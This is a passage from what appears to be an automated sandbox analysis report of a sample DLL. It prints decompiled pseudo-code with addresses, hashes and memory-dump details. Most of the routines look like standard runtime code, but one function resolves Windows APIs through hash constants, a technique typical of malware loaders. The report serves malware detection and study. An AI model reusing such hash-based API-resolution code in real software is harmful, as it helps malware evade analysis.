                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1cc0e5dd1aa9d6e56a01b4e7818d97780cc7f0b9dba7e65a148be762750f4ad4
                                • Instruction ID: 3d4f856c185adeedc897d26f9815f4c7f3fdc69164cbbe44332901cad9d56dc0
                                • Opcode Fuzzy Hash: 1cc0e5dd1aa9d6e56a01b4e7818d97780cc7f0b9dba7e65a148be762750f4ad4
                                • Instruction Fuzzy Hash: 39A15632609A858AE768CF25E0847E977A4F788B48F184139DF4E5B798CF38D591CB20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F75E0 Relevance: .2, Instructions: 181COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00007FFC7FFC130F75E0(void* __rax, void* __rcx, void* __rdx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a40, intOrPtr _a56, intOrPtr _a64, intOrPtr _a80, void* _a88, intOrPtr _a96) {
				void* _t45;
				void* _t50;

				r10d = __rcx + 0x658;
				r8d = __rax + 0x14f3;
				_a96 = r8d;
				_a8 = __rax + 0x3bc;
				_a56 = __rdx + 0x216;
				r9d = _t50 - 0x27b2;
				r11d = _t50 - 0x3bc;
				_a16 = r11d;
				_a64 = _a40 + 0x2ad;
				if (r9d == __rcx + 0x102f) goto 0x130f76c5;
				if (r10d - _t45 - 0x1a27 < 0) goto 0x130f7994;
				_t46 = _a80;
				E00007FFC7FFC130EA280();
				 *((long long*)(_t46 + 0x158)) =  *((intOrPtr*)(_a80 + 0x1a0));
				return _t50 + 0xde3;
			}





                                0x7ffc130f75f2
                                0x7ffc130f7614
                                0x7ffc130f7627
                                0x7ffc130f7635
                                0x7ffc130f763c
                                0x7ffc130f7643
                                0x7ffc130f7651
                                0x7ffc130f765d
                                0x7ffc130f7665
                                0x7ffc130f7675
                                0x7ffc130f7680
                                0x7ffc130f7686
                                0x7ffc130f7696
                                0x7ffc130f76ad
                                0x7ffc130f76c4

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: HeapProcess
                                • String ID:
                                • API String ID: 54951025-0
                                • Opcode ID: 872302a71949d7c02c6d14d4d3198623b2e87e13b17b480820a0ecdd06552e4a
                                • Instruction ID: ee9d1fb66d9c633184230375e44215820569598f7f57b19a315a5e1a04a18515
                                • Opcode Fuzzy Hash: 872302a71949d7c02c6d14d4d3198623b2e87e13b17b480820a0ecdd06552e4a
                                • Instruction Fuzzy Hash: AE9156736096C08BD361CF15F4457EABBA8F388788F10402ADB8957B58DB38E958CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C4540 Relevance: .2, Instructions: 177COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 55%
                                			E00000201201640C4540(void* __ebx, signed int __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r9) {
				void* __rdi;
				long long* _t122;
				long long _t123;
				signed long long _t127;
				signed long long _t128;
				void* _t130;
				void* _t151;
				long long _t152;
				signed long long _t157;
				void* _t159;
				signed long long _t165;
				signed long long _t166;
				void* _t168;

				_t122 = __rax;
				 *((long long*)(_t159 + 8)) = __rbx;
				 *(_t159 + 0x10) = _t157;
				 *((long long*)(_t159 + 0x18)) = __rsi;
				_t155 =  *0x640cd458;
				_t152 = __r9;
				_t130 = __rcx;
				if (__r9 != 0) goto 0x640c4577;
				goto 0x640c4770;
				r8d = 0x10;
				0x640c47b0(_t168, _t165, _t151);
				E00000201201640C908C(0x9ffc4c27, __rax,  *((intOrPtr*)( *0x640cd458 + 0x10)));
				if (_t122 == 0) goto 0x640c459f;
				 *_t122();
				_t7 = _t130 + 0x88; // 0x88
				_t123 = _t7;
				_t166 = _t165 | 0xffffffff;
				 *_t123 = _t123;
				 *((long long*)(__rcx + 0x90)) = _t123;
				 *((long long*)(__rcx + 0xa0)) = E00000201201640C825C;
				 *(__rcx + 0x10) = _t166;
				 *((long long*)(__rcx + 0xa8)) = 0x201640c2304;
				 *((long long*)(__rcx + 0x98)) = 0x201640c1730;
				E00000201201640C908C(0xdc444c2b, 0x201640c1730,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				r13d = _t166 + 2;
				if (0x201640c1730 == 0) goto 0x640c4609;
				r9d = 0;
				r8d = 0;
				 *((long long*)(0x201640c1730))();
				goto 0x640c460b;
				 *((long long*)(__rcx + 0x20)) = 0x201640c1730;
				if (0x201640c1730 == 0) goto 0x640c474e;
				E00000201201640C908C(0xdc444c2b, 0x201640c1730,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (0x201640c1730 == 0) goto 0x640c463a;
				r9d = 0;
				r8d = 0;
				 *((long long*)(0x201640c1730))();
				goto 0x640c463c;
				 *((long long*)(__rcx + 0x30)) = 0x201640c1730;
				if (0x201640c1730 == 0) goto 0x640c474e;
				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t157;
				E00000201201640C908C(0x3ff22481, 0x201640c1730,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (0x201640c1730 == 0) goto 0x640c466b;
				r8d = 0;
				 *((long long*)(0x201640c1730))();
				goto 0x640c466d;
				 *((long long*)(__rcx + 0x28)) = 0x201640c1730;
				 *(__rcx + 0x38) = 0x201640c1730;
				if (0x201640c1730 == 0) goto 0x640c474e;
				E00000201201640C240C(0, __rcx, __r9, __r9, _t155);
				 *_t130 = 0x201640c1730;
				E00000201201640C908C(0x176fdd38, 0x201640c1730,  *((intOrPtr*)(_t155 + 0x30)));
				if (0x201640c1730 == 0) goto 0x640c46b0;
				r8d = 6;
				 *((long long*)(0x201640c1730))();
				goto 0x640c46b3;
				_t127 = _t166;
				 *(_t130 + 0x10) = _t127;
				if (_t127 != _t166) goto 0x640c4714;
				E00000201201640C908C(0xb27f4910, _t127,  *((intOrPtr*)(_t155 + 0x30)));
				if (_t127 == 0) goto 0x640c46dd;
				 *_t127();
				goto 0x640c46df;
				if (0 != 0) goto 0x640c474e;
				E00000201201640C908C(0x176fdd38, _t127,  *((intOrPtr*)(_t155 + 0x30)));
				if (_t127 == 0) goto 0x640c4708;
				r8d = 6;
				 *_t127();
				goto 0x640c470b;
				_t128 = _t166;
				 *(_t130 + 0x10) = _t128;
				if (_t128 == _t166) goto 0x640c474e;
				_t32 = _t130 + 0x18; // 0x18
				E00000201201640C8470(_t128, _t130, 0x201640c2a8c, _t130, _t155, _t157, _t32);
				 *(_t130 + 8) = _t128;
				if (_t128 == 0) goto 0x640c474e;
				E00000201201640C908C(0x38e683e4, _t128,  *((intOrPtr*)(_t155 + 0x18)));
				if (_t128 == 0) goto 0x640c474a;
				 *_t128();
				goto 0x640c4791;
				E00000201201640C908C(0xc06f8334, _t128,  *((intOrPtr*)(_t155 + 0x18)));
				if (_t128 == 0) goto 0x640c4767;
				 *_t128();
				goto 0x640c476c;
				if (0x7f == 0) goto 0x640c4791;
				E00000201201640C2874(_t130, _t130, _t152, _t155);
				if (r13d == 0) goto 0x640c4791;
				E00000201201640C908C(0x9cb92d3f, _t128,  *((intOrPtr*)(_t155 + 0x30)));
				if (_t128 == 0) goto 0x640c4791;
				 *_t128();
				return 0x7f;
			}
















                                0x201640c4540
                                0x201640c4540
                                0x201640c4545
                                0x201640c454a
                                0x201640c455b
                                0x201640c4564
                                0x201640c4567
                                0x201640c456d
                                0x201640c4572
                                0x201640c457b
                                0x201640c4581
                                0x201640c458f
                                0x201640c4597
                                0x201640c459d
                                0x201640c459f
                                0x201640c459f
                                0x201640c45a6
                                0x201640c45af
                                0x201640c45b2
                                0x201640c45c0
                                0x201640c45ce
                                0x201640c45d2
                                0x201640c45e0
                                0x201640c45eb
                                0x201640c45f0
                                0x201640c45f8
                                0x201640c45fa
                                0x201640c45fd
                                0x201640c4605
                                0x201640c4607
                                0x201640c460b
                                0x201640c4612
                                0x201640c4621
                                0x201640c4629
                                0x201640c462b
                                0x201640c462e
                                0x201640c4636
                                0x201640c4638
                                0x201640c463c
                                0x201640c4643
                                0x201640c4649
                                0x201640c4656
                                0x201640c465e
                                0x201640c4660
                                0x201640c4667
                                0x201640c4669
                                0x201640c466d
                                0x201640c4671
                                0x201640c4678
                                0x201640c4683
                                0x201640c468d
                                0x201640c4694
                                0x201640c46a1
                                0x201640c46a6
                                0x201640c46ac
                                0x201640c46ae
                                0x201640c46b0
                                0x201640c46b3
                                0x201640c46ba
                                0x201640c46c5
                                0x201640c46cd
                                0x201640c46d9
                                0x201640c46db
                                0x201640c46e1
                                0x201640c46ef
                                0x201640c46f7
                                0x201640c46f9
                                0x201640c4704
                                0x201640c4706
                                0x201640c4708
                                0x201640c470b
                                0x201640c4712
                                0x201640c4714
                                0x201640c4722
                                0x201640c4727
                                0x201640c472e
                                0x201640c4739
                                0x201640c4741
                                0x201640c4748
                                0x201640c474c
                                0x201640c4757
                                0x201640c475f
                                0x201640c4761
                                0x201640c4765
                                0x201640c476e
                                0x201640c4773
                                0x201640c477a
                                0x201640c4785
                                0x201640c478d
                                0x201640c478f
                                0x201640c47af

                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 485612231-0
                                • Opcode ID: f62f74501b8a1f376dc91424def19afeb0dba0c971c8bdd2357202f4e6c04303
                                • Instruction ID: 5cde628924682c2e96c5223d22b7db5ba09d2e12200d5ae71615f47064e62240
                                • Opcode Fuzzy Hash: f62f74501b8a1f376dc91424def19afeb0dba0c971c8bdd2357202f4e6c04303
                                • Instruction Fuzzy Hash: 1561D721311B20D7FB609B21AC0A7DA62A9FB88794F184925AF5D437CFDF36D4208358
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F65F0 Relevance: .0, Instructions: 32COMMON
                                Download Yara Rule
                                C-Code - Quality: 86%
                                			E00007FFC7FFC130F65F0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x13124de0 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x130f6651;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x13124de0; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x13124de0 = r8d;
				 *0x13124de4 = r8d;
				return 0;
			}







                                0x7ffc130f65f0
                                0x7ffc130f65f6
                                0x7ffc130f65fb
                                0x7ffc130f6602
                                0x7ffc130f6602
                                0x7ffc130f6609
                                0x7ffc130f660b
                                0x7ffc130f6613
                                0x7ffc130f6619
                                0x7ffc130f661d
                                0x7ffc130f6623
                                0x7ffc130f6627
                                0x7ffc130f6631
                                0x7ffc130f663b
                                0x7ffc130f6646
                                0x7ffc130f664a
                                0x7ffc130f6651
                                0x7ffc130f665f

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e6dd937c2acb30d00e6a2a6694bbe294dad4cbe04de7d1fc66be6ba8f802123c
                                • Instruction ID: f634ccda21d78dd371d6097baea794805e57d7d0e9e7b1a155a9fce9e968e511
                                • Opcode Fuzzy Hash: e6dd937c2acb30d00e6a2a6694bbe294dad4cbe04de7d1fc66be6ba8f802123c
                                • Instruction Fuzzy Hash: 69F044717186698AEBA5CF28BC0262977F0F7183D4BA08039D58D93A04DA3C9460CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EE9E0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 197COMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E00007FFC7FFC130EE9E0(intOrPtr* __rax, long long __rbx, signed int* __rcx, char* __rdx, long long _a8) {
				long long _v24;
				signed int _t21;
				signed int _t24;
				void* _t39;
				char _t42;
				void* _t47;
				void* _t63;
				signed int _t69;
				signed int _t74;
				intOrPtr* _t89;
				char* _t93;
				char* _t94;
				char* _t96;
				char* _t98;
				char* _t99;
				void* _t100;
				void* _t101;
				void* _t119;

				_t89 = __rax;
				_a8 = __rbx;
				_t21 =  *0x13124dc8; // 0x0
				_v24 = __rcx;
				asm("movsd xmm0, [esp+0x20]");
				asm("movsd [edi], xmm0");
				__rcx[2] = 0;
				__rcx[1] = _t21;
				if ( *__rdx != 0x20) goto 0x130eea1a;
				_t93 = __rdx + 1;
				if ( *_t93 == 0x20) goto 0x130eea12;
				if ( *_t93 == 0x61) goto 0x130eea40;
				if ( *_t93 == 0x72) goto 0x130eea35;
				if ( *_t93 != 0x77) goto 0x130eec5d;
				 *__rcx = 0x301;
				goto 0x130eea46;
				 *__rcx =  *__rcx & 0;
				__rcx[1] = 1;
				goto 0x130eea4d;
				 *__rcx = 0x109;
				__rcx[1] = 2;
				_t94 = _t93 + 1;
				r9b = 0;
				r11b = 0;
				r10b = 0;
				r8b = 0;
				if ( *_t94 == 0) goto 0x130eeb8b;
				_t42 =  *_t94;
				_t63 = _t42 - 0x53;
				if (_t63 > 0) goto 0x130eeb0c;
				if (_t63 == 0) goto 0x130eeafc;
				if (_t63 == 0) goto 0x130eeb79;
				if (_t63 == 0) goto 0x130eead0;
				if (_t63 == 0) goto 0x130eeac8;
				if (_t63 == 0) goto 0x130eeab6;
				_t47 = _t42 - 0xfffffffffffffff2;
				if (_t63 == 0) goto 0x130eeaad;
				if (_t47 != 4) goto 0x130eec5d;
				if (r10b != 0) goto 0x130eeb6d;
				 *__rcx =  *__rcx | 0x00000010;
				goto 0x130eeb04;
				asm("bts dword [edi], 0x7");
				goto 0x130eeb77;
				if (( *__rcx & 0x00000040) != 0) goto 0x130eeb6d;
				goto 0x130eeb75;
				r8b = 1;
				goto 0x130eeb6d;
				if (r11b != 0) goto 0x130eeb6d;
				_t24 =  *__rcx;
				r11b = 1;
				if ((_t24 & 0x00000002) != 0) goto 0x130eeb6d;
				 *__rcx = _t24 & 0xfffffffe | 0x00000002;
				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
				goto 0x130eeb77;
				_t69 = r10b;
				if (_t69 != 0) goto 0x130eeb6d;
				 *__rcx =  *__rcx | 0x00000020;
				r10b = 1;
				goto 0x130eeb79;
				if (_t69 == 0) goto 0x130eeb65;
				if (_t69 == 0) goto 0x130eeb56;
				if (_t69 == 0) goto 0x130eeb44;
				if (_t69 == 0) goto 0x130eeb38;
				if (_t47 - 0x3a != 6) goto 0x130eec5d;
				if (( *__rcx & 0x0000c000) != 0) goto 0x130eeb6d;
				asm("bts eax, 0xe");
				goto 0x130eeb75;
				if (r9b != 0) goto 0x130eeb6d;
				asm("btr dword [edi+0x4], 0xb");
				goto 0x130eeb4e;
				if (r9b != 0) goto 0x130eeb6d;
				asm("bts dword [edi+0x4], 0xb");
				r9b = 1;
				goto 0x130eeb79;
				_t74 =  *__rcx & 0x0000c000;
				if (_t74 != 0) goto 0x130eeb6d;
				asm("bts eax, 0xf");
				goto 0x130eeb75;
				asm("bt eax, 0xc");
				if (_t74 >= 0) goto 0x130eeb71;
				goto 0x130eeb79;
				asm("bts eax, 0xc");
				if (1 != 0) goto 0x130eea5e;
				if (r8b == 0) goto 0x130eeb93;
				_t96 = _t94 + __rax + 1;
				if ( *_t96 == 0x20) goto 0x130eeb90;
				if (r8b != 0) goto 0x130eebaf;
				if ( *_t96 != 0) goto 0x130eec5d;
				__rcx[2] = 1;
				goto 0x130eec6d;
				r8d = 3;
				if (E00007FFC7FFC130F1B40(_t47 - 0x3a, _t96, 0x1310ed38, _t119) != 0) goto 0x130eec5d;
				goto 0x130eebd5;
				_t98 = _t96 + 4;
				if ( *_t98 == 0x20) goto 0x130eebd2;
				if ( *_t98 != 0x3d) goto 0x130eec5d;
				_t99 = _t98 + 1;
				if ( *_t99 == 0x20) goto 0x130eebdf;
				r8d = 5;
				if (E00007FFC7FFC130F1C08(1, _t89, _t99) != 0) goto 0x130eec0a;
				_t100 = _t99 + 5;
				asm("bts dword [edi], 0x12");
				goto 0x130eec53;
				r8d = 8;
				if (E00007FFC7FFC130F1C08(1, _t89, _t100) != 0) goto 0x130eec2d;
				_t101 = _t100 + 8;
				asm("bts dword [edi], 0x11");
				goto 0x130eec53;
				r8d = 7;
				if (E00007FFC7FFC130F1C08(1, _t89, _t101) != 0) goto 0x130eec5d;
				asm("bts dword [edi], 0x10");
				goto 0x130eec53;
				if ( *((char*)(_t101 + 8)) == 0x20) goto 0x130eec50;
				goto 0x130eeb9d;
				_t39 = E00007FFC7FFC130EE6A0(_t89);
				 *_t89 = 0x16;
				return E00007FFC7FFC130EE580(_t39);
			}





















                                0x7ffc130ee9e0
                                0x7ffc130ee9e0
                                0x7ffc130ee9ea
                                0x7ffc130ee9fb
                                0x7ffc130eea00
                                0x7ffc130eea06
                                0x7ffc130eea0a
                                0x7ffc130eea0d
                                0x7ffc130eea10
                                0x7ffc130eea12
                                0x7ffc130eea18
                                0x7ffc130eea1d
                                0x7ffc130eea22
                                0x7ffc130eea27
                                0x7ffc130eea2d
                                0x7ffc130eea33
                                0x7ffc130eea35
                                0x7ffc130eea37
                                0x7ffc130eea3e
                                0x7ffc130eea40
                                0x7ffc130eea46
                                0x7ffc130eea4d
                                0x7ffc130eea50
                                0x7ffc130eea53
                                0x7ffc130eea56
                                0x7ffc130eea59
                                0x7ffc130eea61
                                0x7ffc130eea67
                                0x7ffc130eea6a
                                0x7ffc130eea6d
                                0x7ffc130eea73
                                0x7ffc130eea7c
                                0x7ffc130eea85
                                0x7ffc130eea8a
                                0x7ffc130eea8f
                                0x7ffc130eea91
                                0x7ffc130eea94
                                0x7ffc130eea99
                                0x7ffc130eeaa2
                                0x7ffc130eeaa8
                                0x7ffc130eeaab
                                0x7ffc130eeaad
                                0x7ffc130eeab1
                                0x7ffc130eeaba
                                0x7ffc130eeac3
                                0x7ffc130eeac8
                                0x7ffc130eeacb
                                0x7ffc130eead3
                                0x7ffc130eead9
                                0x7ffc130eeadb
                                0x7ffc130eeae0
                                0x7ffc130eeaec
                                0x7ffc130eeaf7
                                0x7ffc130eeafa
                                0x7ffc130eeafc
                                0x7ffc130eeaff
                                0x7ffc130eeb01
                                0x7ffc130eeb04
                                0x7ffc130eeb0a
                                0x7ffc130eeb0f
                                0x7ffc130eeb14
                                0x7ffc130eeb19
                                0x7ffc130eeb1e
                                0x7ffc130eeb23
                                0x7ffc130eeb30
                                0x7ffc130eeb32
                                0x7ffc130eeb36
                                0x7ffc130eeb3b
                                0x7ffc130eeb3d
                                0x7ffc130eeb42
                                0x7ffc130eeb47
                                0x7ffc130eeb49
                                0x7ffc130eeb4e
                                0x7ffc130eeb54
                                0x7ffc130eeb58
                                0x7ffc130eeb5d
                                0x7ffc130eeb5f
                                0x7ffc130eeb63
                                0x7ffc130eeb67
                                0x7ffc130eeb6b
                                0x7ffc130eeb6f
                                0x7ffc130eeb71
                                0x7ffc130eeb85
                                0x7ffc130eeb8e
                                0x7ffc130eeb90
                                0x7ffc130eeb96
                                0x7ffc130eeb9b
                                0x7ffc130eeba0
                                0x7ffc130eeba6
                                0x7ffc130eebaa
                                0x7ffc130eebaf
                                0x7ffc130eebc6
                                0x7ffc130eebd0
                                0x7ffc130eebd2
                                0x7ffc130eebd8
                                0x7ffc130eebdd
                                0x7ffc130eebdf
                                0x7ffc130eebe5
                                0x7ffc130eebe7
                                0x7ffc130eebfe
                                0x7ffc130eec00
                                0x7ffc130eec04
                                0x7ffc130eec08
                                0x7ffc130eec0a
                                0x7ffc130eec21
                                0x7ffc130eec23
                                0x7ffc130eec27
                                0x7ffc130eec2b
                                0x7ffc130eec2d
                                0x7ffc130eec44
                                0x7ffc130eec4a
                                0x7ffc130eec4e
                                0x7ffc130eec56
                                0x7ffc130eec58
                                0x7ffc130eec5d
                                0x7ffc130eec62
                                0x7ffc130eec7a

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: $ $ $ $ $=$UTF-16LEUNICODE$UTF-8$a$ccs$r$w
                                • API String ID: 3215553584-2974328796
                                • Opcode ID: 1ecd3638b6b5b4803adb73e9b05685090d72192c7f812e774ce7cb5667e9f9cd
                                • Instruction ID: d9a1f6b03bdfcfdbed7ee447770e303240d7aa242ef540ab3fabfea4184fdd53
                                • Opcode Fuzzy Hash: 1ecd3638b6b5b4803adb73e9b05685090d72192c7f812e774ce7cb5667e9f9cd
                                • Instruction Fuzzy Hash: 26718C72F0DE7F86F7694A249A5433A2AD1AF1236CF189435CA1E625D1CB2CBC30D721
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F243C Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 39%
                                			E00007FFC7FFC130F243C(signed int __ebx, void* __eflags, signed int __rbx, intOrPtr* __rcx, signed int* __rdx, signed int __rdi, void* __rsi, signed int __r8) {
				void* __rbp;
				signed int _t120;
				long _t134;
				void* _t137;
				void* _t139;
				void* _t140;
				signed int _t155;
				signed int _t156;
				signed char _t160;
				signed char _t161;
				void* _t185;
				void* _t186;
				signed int* _t207;
				intOrPtr* _t210;
				long long _t221;
				intOrPtr* _t229;
				signed long long _t237;
				intOrPtr _t251;
				signed long long _t252;
				signed long long _t272;
				signed long long _t273;
				signed int* _t278;
				void* _t281;
				void* _t282;
				signed int* _t284;
				void* _t285;
				void* _t293;
				void* _t295;
				void* _t300;
				void* _t303;

				_t280 = __rsi;
				_t155 = __ebx;
				_t207 = _t284;
				_t207[2] = __rbx;
				_t207[4] = __rdi;
				_t207[6] = __r8;
				_t282 = _t207 - 0x47;
				_t285 = _t284 - 0xc0;
				r12d = r9d;
				r9d =  *(_t282 + 0x77);
				_t278 = __rdx;
				r8d =  *(_t282 + 0x6f);
				_t229 = __rcx;
				E00007FFC7FFC130F20A8(r12d, __eflags, _t207, __rcx, _t282 - 1, _t282);
				asm("movups xmm0, [eax]");
				asm("movups xmm1, xmm0");
				asm("psrldq xmm1, 0x8");
				asm("dec cx");
				 *(_t282 - 0x11) = _t303 >> 0x20;
				asm("movups [ebp-0x59], xmm0");
				asm("movsd xmm0, [eax+0x10]");
				asm("movsd [ebp-0x31], xmm0");
				asm("movsd [ebp-0x49], xmm0");
				if (r15d != 0xffffffff) goto 0x130f24c7;
				E00007FFC7FFC130EE680(_t207);
				 *_t207 =  *_t207 & 0x00000000;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FFC7FFC130EE6A0(_t207);
				goto 0x130f280e;
				_t120 = E00007FFC7FFC130F3C80(r12d, _t185, _t207, _t229, _t282 - 1, __rdx, __rdx, __rsi);
				 *__rdx = _t120;
				if (_t120 != 0xffffffff) goto 0x130f24eb;
				E00007FFC7FFC130EE680(_t207);
				 *_t207 =  *_t207 & 0x00000000;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FFC7FFC130EE6A0(_t207);
				 *_t207 = 0x18;
				goto 0x130f24bb;
				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
				r8d = r15d;
				 *(_t282 - 0x21) =  *(_t282 - 0x21) & 0x00000000;
				 *_t229 = 1;
				_t231 =  *(_t282 - 0x49) >> 0x20;
				_t156 = _t155 |  *(_t282 - 0x49);
				 *(_t285 + 0x28) = _t156;
				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
				 *(_t282 - 0x29) = 0x18;
				 *(_t282 - 0x19) =  !(r12d >> 7) & 0x00000001;
				 *(_t282 - 0x39) =  *(_t282 - 0x49) >> 0x20;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				r14d =  *(_t282 - 0x55);
				 *(_t282 - 0x41) = _t207;
				if (_t207 != 0xffffffff) goto 0x130f25df;
				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x130f25ac;
				if ((r12b & 0x00000001) == 0) goto 0x130f25ac;
				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
				asm("inc ecx");
				 *(_t282 - 0x55) = r14d;
				r8d = r15d;
				 *(_t285 + 0x28) = _t156;
				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				 *(_t282 - 0x41) = _t207;
				if (_t207 != 0xffffffff) goto 0x130f25df;
				_t237 =  *__rdx;
				_t210 =  *((intOrPtr*)(0x13124970 + (_t237 >> 6) * 8));
				 *(_t210 + (_t237 << 6) + 0x38) =  *(_t210 + (_t237 << 6) + 0x38) & 0x000000fe;
				E00007FFC7FFC130EE630(GetLastError(), _t210,  *(_t282 - 0x49) >> 0x20);
				goto 0x130f24bb;
				if (GetFileType(_t303) != 0) goto 0x130f263d;
				_t134 = GetLastError();
				E00007FFC7FFC130EE630(_t134, _t210,  *(_t282 - 0x49) >> 0x20);
				 *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) =  *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) & 0x000000fe;
				CloseHandle(_t300);
				if (_t134 != 0) goto 0x130f24bb;
				_t137 = E00007FFC7FFC130EE6A0(_t210);
				 *_t210 = 0xd;
				goto 0x130f24bb;
				if (_t137 != 2) goto 0x130f264a;
				goto 0x130f2652;
				if (_t137 != 3) goto 0x130f2652;
				_t160 =  *(_t282 - 0x59) | 0x48;
				E00007FFC7FFC130F3B9C(_t160,  *__rdx, _t186,  *(_t282 - 0x49) >> 0x20, _t207, __rdx, _t280, _t282, _t295, _t293);
				_t161 = _t160 | 0x00000001;
				 *(_t282 - 0x59) = _t161;
				 *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) = _t161;
				 *((char*)( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x39)) = 0;
				if ((r12b & 0x00000002) == 0) goto 0x130f26b4;
				_t139 = E00007FFC7FFC130F22B4(_t161,  *__rdx, r12d & 0x0000003f,  *(_t282 - 0x49) >> 0x20, _t280);
				r13d = _t139;
				if (_t139 != 0) goto 0x130f26e3;
				asm("movups xmm0, [ebp-0x59]");
				asm("movsd xmm1, [ebp-0x31]");
				r8d = r12d;
